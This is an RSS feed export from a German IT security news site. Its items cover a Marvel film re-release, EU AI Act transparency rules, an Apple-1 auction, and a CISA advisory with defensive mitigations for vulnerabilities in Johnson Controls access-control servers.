<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=surviving+midnight+700line+cure%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Tue, 28 Jul 2026 10:25:28 +0200</lastBuildDate>
<pubDate>Tue, 28 Jul 2026 10:25:28 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=surviving+midnight+700line+cure%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=surviving+midnight+700line+cure%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Avengers: Endgame Re-Release Includes Exclusive Avengers: Doomsday Preview]]></title>
<description><![CDATA[Marvel Studios is bringing Avengers: Endgame back to theaters on September 25, 2026, with an exclusive look at the upcoming Avengers: Doomsday.



The re-release gives Marvel fans another opportunity to watch the 2019 blockbuster in theaters. The film follows the surviving Avengers as they attemp...]]></description>
<link>https://tsecurity.de/de/3695272/ios-mac-os/avengers-endgame-re-release-includes-exclusive-avengers-doomsday-preview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695272/ios-mac-os/avengers-endgame-re-release-includes-exclusive-avengers-doomsday-preview/</guid>
<pubDate>Sun, 26 Jul 2026 09:21:44 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Marvel Studios is bringing Avengers: Endgame back to theaters on September 25, 2026, with an exclusive look at the upcoming Avengers: Doomsday.



The re-release gives Marvel fans another opportunity to watch the 2019 blockbuster in theaters. The film follows the surviving Avengers as they attempt to reverse Thanos’ devastating snap and restore half of all life across the universe.



The new theatrical run also serves as part of Marvel’s preparation for its next major crossover event. Viewers who attend the re-release will receive an early look at Avengers: Doomsday, although the exact length and format of the preview have not been announced.



Exclusive Avengers: Doomsday Footage Expected







Avengers: Doomsday will bring several major Marvel heroes together and introduce Robert Downey Jr. as Victor von Doom. The movie will also feature characters connected to the Avengers, Fantastic Four, X-Men and other parts of the Marvel Cinematic Universe.



Recent footage has highlighted Doctor Doom’s role in the story and his connections with the Fantastic Four. However, Marvel has kept several important plot details private ahead of the theatrical release.



The Russo brothers, who directed Avengers: Endgame, are also directing the new movie. Their return has raised expectations for another large-scale Marvel story involving several teams and universes.



Avengers: Doomsday is scheduled to arrive in theaters on December 18, 2026. The Endgame re-release gives audiences nearly three months to revisit the earlier Avengers finale before Marvel begins its next major chapter.]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3694779/ai-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694779/ai-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4199109/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Apple-1 auction expected to cost the winner as much as 275 iPhone 17 Pros]]></title>
<description><![CDATA[A working 1977 Apple-1 expected to garner at least $300,000 leads RR Auction's sprawling sale of rare hardware, prototypes, and Steve Jobs memorabilia from Apple's earliest years.The 'Neumark' Apple-1 - 'Byte Shop'-Style. Image credit: RR AuctionsThe Apple-1 comes from Apple's second batch of 50 ...]]></description>
<link>https://tsecurity.de/de/3692312/ios-mac-os/this-apple-1-auction-expected-to-cost-the-winner-as-much-as-275-iphone-17-pros/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692312/ios-mac-os/this-apple-1-auction-expected-to-cost-the-winner-as-much-as-275-iphone-17-pros/</guid>
<pubDate>Fri, 24 Jul 2026 20:48:38 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A working 1977 Apple-1 expected to garner at least $300,000 leads RR Auction's sprawling sale of rare hardware, prototypes, and <a href="https://appleinsider.com/inside/steve-jobs" title="Steve Jobs" data-kpt="1">Steve Jobs</a> memorabilia from Apple's earliest years.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68357-144067-1039C832-5BB1-46DA-9996-DF1ACC1FE9B1-xl.jpg" alt="Open suitcase containing a vintage portable computer setup with a builtin keyboard and cassette recorder, shown on a plain white background." height="738"><span>The 'Neumark' Apple-1 - 'Byte Shop'-Style. Image credit: RR Auctions</span></div><br>The <a href="https://appleinsider.com/articles/25/07/29/rare-apple-memorabilia-macs-more-up-for-auction-ending-august-21" data-kpt="1">Apple-1</a> comes from Apple's second batch of 50 machines, according to the auction house. Known as the <a href="https://www.rrauction.com/auctions/lot-detail/351632707484040-apple-1-computer-the-neumark-apple-1-byte-shop-style-in-a-unique-smith-corona-typewriter-case-with-original-documentation-sold-internationally-in-1977/" data-kpt="1">"Neumark" computer</a>, it sits inside a modified Smith-Corona typewriter case and was restored to working condition by Apple-1 specialist Corey Cohen in June 2026.<br><br>Apple sold the Apple-1 as an assembled circuit board rather than a complete consumer computer, so buyers had to add the other components and an enclosure themselves. The Neumark machine stands out because it still works inside the suitcase. The auction also includes surviving documentation.<br><br>RR Auction's estimates aren't guarantees of what buyers will pay. Final prices will depend on how much competition each lot attracts before the sale closes.<br><br><br> <a href="https://appleinsider.com/articles/26/07/24/this-apple-1-auction-expected-to-cost-the-winner-as-much-as-275-iphone-17-pros?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245057?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Johnson Controls C-CURE 9000 and Victor application server]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of these vulnerabilities could allow an attacker with network access to achieve remote code execution.
The following versions of Johnson Controls C-CURE 9000 and Victor application server are affected:

C-CURE 9000 and victor]]></description>
<link>https://tsecurity.de/de/3689942/it-security-nachrichten/johnson-controls-c-cure-9000-and-victor-application-server/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689942/it-security-nachrichten/johnson-controls-c-cure-9000-and-victor-application-server/</guid>
<pubDate>Thu, 23 Jul 2026 20:17:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-204-01.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of these vulnerabilities could allow an attacker with network access to achieve remote code execution.</strong></p>
<p>The following versions of Johnson Controls C-CURE 9000 and Victor application server are affected:</p>
<ul>
<li>C-CURE 9000 and victor &lt;=v2.90_v3.0 </li>
<li>victor Web &lt;=v7.1 </li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.6</td>
<td>Johnson Controls</td>
<td>Johnson Controls C-CURE 9000 and Victor application server</td>
<td>Server-Side Request Forgery (SSRF), Execution with Unnecessary Privileges</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Ireland</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-21655</a></h3>
<div class="csaf-accordion-content">
<p>Under certain circumstances, successful exploitation of this vulnerability could allow an unauthenticated attacker on the adjacent network to achieve arbitrary code execution on the C-CURE 9000 or victor application server, as well as connected clients (e.g., workstations of physical security personnel). Such an attack could impact physical security controls.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-21655">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Johnson Controls C-CURE 9000 and Victor application server</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Johnson Controls</div>
<div class="ics-version"><strong>Product Version:</strong><br>Johnson Controls C-CURE 9000 and victor: &lt;=v2.90_v3.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Johnson Controls recommends the following defensive measures to help reduce the risk of exploitation: (CVE-2026-21655) Upgrade to C-CURE 9000 / victor version 3.20 or later, which addresses the vulnerable deserialization path (LV1.1).</p>
<p><strong>Vendor fix</strong><br>Network segmentation - Isolate the C-CURE 9000 and victor application servers on a dedicated network segment and restrict access to port 8999 to only authorized systems that require connectivity.</p>
<p><strong>Mitigation</strong><br>Firewall / access control lists - Implement strict firewall rules to block all unnecessary inbound connections to port 8999 from untrusted network segments.</p>
<p><strong>Mitigation</strong><br>Intrusion detection / prevention - Deploy IDS/IPS signatures tuned to detect known .NET deserialization exploit payloads (e.g., ysoserial.net patterns) targeting port 8999.</p>
<p><strong>Mitigation</strong><br>Application whitelisting - Enforce application whitelisting on application server hosts to prevent unauthorized executables from being launched by the server process.</p>
<p><strong>Mitigation</strong><br>Least privilege - Ensure the application server process runs with the minimum privileges necessary, reducing the impact of successful exploitation.</p>
<p><strong>Mitigation</strong><br>Monitor and audit - Enable detailed logging on application server hosts and monitor for anomalous process creation by SoftwareHouse.CrossFire.Server.exe.</p>
<p><strong>Mitigation</strong><br>Disable unnecessary services - If the ClientConnectionManager_NF.SynchronousServerNotification callback interface is not required, disable or restrict it to reduce attack surface.</p>
<p><strong>Mitigation</strong><br>For more detailed mitigation instructions, please see Johnson Controls Product Security Advisories JCI-PSA-2026-07, JCI-PSA-2026-13, and JCI-PSA-2026-16 at the following location: https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories<br><a href="https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories">https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/918.html">CWE-918 Server-Side Request Forgery (SSRF)</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-21653</a></h3>
<div class="csaf-accordion-content">
<p>Under certain circumstances, successful exploitation of this vulnerability could allow an attacker to forge server-side HTTP requests from the victor Web application. This could be leveraged to interact with internal services running on the host or accessible on the local network, potentially leading to unauthorized information disclosure or lateral movement within the network.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-21653">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Johnson Controls C-CURE 9000 and Victor application server</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Johnson Controls</div>
<div class="ics-version"><strong>Product Version:</strong><br>Johnson Controls victor Web: &lt;v7.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>(CVE-2026-21653, CVE-2026-34496) Update all victor Web installations to version 7.0 or later, which contains the fix for this vulnerability. The fix has been validated through independent retest.</p>
<p><strong>Mitigation</strong><br>Firewall / access control lists - Implement strict firewall rules to block all unnecessary inbound connections to port 8999 from untrusted network segments.</p>
<p><strong>Mitigation</strong><br>Intrusion detection / prevention - Deploy IDS/IPS signatures tuned to detect known .NET deserialization exploit payloads (e.g., ysoserial.net patterns) targeting port 8999.</p>
<p><strong>Mitigation</strong><br>Application whitelisting - Enforce application whitelisting on application server hosts to prevent unauthorized executables from being launched by the server process.</p>
<p><strong>Mitigation</strong><br>Least privilege - Ensure the application server process runs with the minimum privileges necessary, reducing the impact of successful exploitation.</p>
<p><strong>Mitigation</strong><br>Monitor and audit - Enable detailed logging on application server hosts and monitor for anomalous process creation by SoftwareHouse.CrossFire.Server.exe.</p>
<p><strong>Mitigation</strong><br>Disable unnecessary services - If the ClientConnectionManager_NF.SynchronousServerNotification callback interface is not required, disable or restrict it to reduce attack surface.</p>
<p><strong>Mitigation</strong><br>For more detailed mitigation instructions, please see Johnson Controls Product Security Advisories JCI-PSA-2026-07, JCI-PSA-2026-13, and JCI-PSA-2026-16 at the following location: https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories<br><a href="https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories">https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/918.html">CWE-918 Server-Side Request Forgery (SSRF)</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.6</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>9.4</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H">CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-34496</a></h3>
<div class="csaf-accordion-content">
<p>Under certain circumstances, successful exploitation of this vulnerability could result in low privilege users accessing unauthorized pages such as Users and Logs. Successful exploitation could allow an attacker to view sensitive system information, user account details, and audit logs beyond their intended access level, potentially enabling further attacks or unauthorized administrative actions.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-34496">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Johnson Controls C-CURE 9000 and Victor application server</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Johnson Controls</div>
<div class="ics-version"><strong>Product Version:</strong><br>Johnson Controls victor Web: &lt;=v7.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>(CVE-2026-21653, CVE-2026-34496) Update all victor Web installations to version 7.0 or later, which contains the fix for this vulnerability. The fix has been validated through independent retest.</p>
<p><strong>Mitigation</strong><br>Firewall / access control lists - Implement strict firewall rules to block all unnecessary inbound connections to port 8999 from untrusted network segments.</p>
<p><strong>Mitigation</strong><br>Intrusion detection / prevention - Deploy IDS/IPS signatures tuned to detect known .NET deserialization exploit payloads (e.g., ysoserial.net patterns) targeting port 8999.</p>
<p><strong>Mitigation</strong><br>Application whitelisting - Enforce application whitelisting on application server hosts to prevent unauthorized executables from being launched by the server process.</p>
<p><strong>Mitigation</strong><br>Least privilege - Ensure the application server process runs with the minimum privileges necessary, reducing the impact of successful exploitation.</p>
<p><strong>Mitigation</strong><br>Monitor and audit - Enable detailed logging on application server hosts and monitor for anomalous process creation by SoftwareHouse.CrossFire.Server.exe.</p>
<p><strong>Mitigation</strong><br>Disable unnecessary services - If the ClientConnectionManager_NF.SynchronousServerNotification callback interface is not required, disable or restrict it to reduce attack surface.</p>
<p><strong>Mitigation</strong><br>For more detailed mitigation instructions, please see Johnson Controls Product Security Advisories JCI-PSA-2026-07, JCI-PSA-2026-13, and JCI-PSA-2026-16 at the following location: https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories<br><a href="https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories">https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/250.html">CWE-250 Execution with Unnecessary Privileges</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Harrison Neal reported these vulnerabilities to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
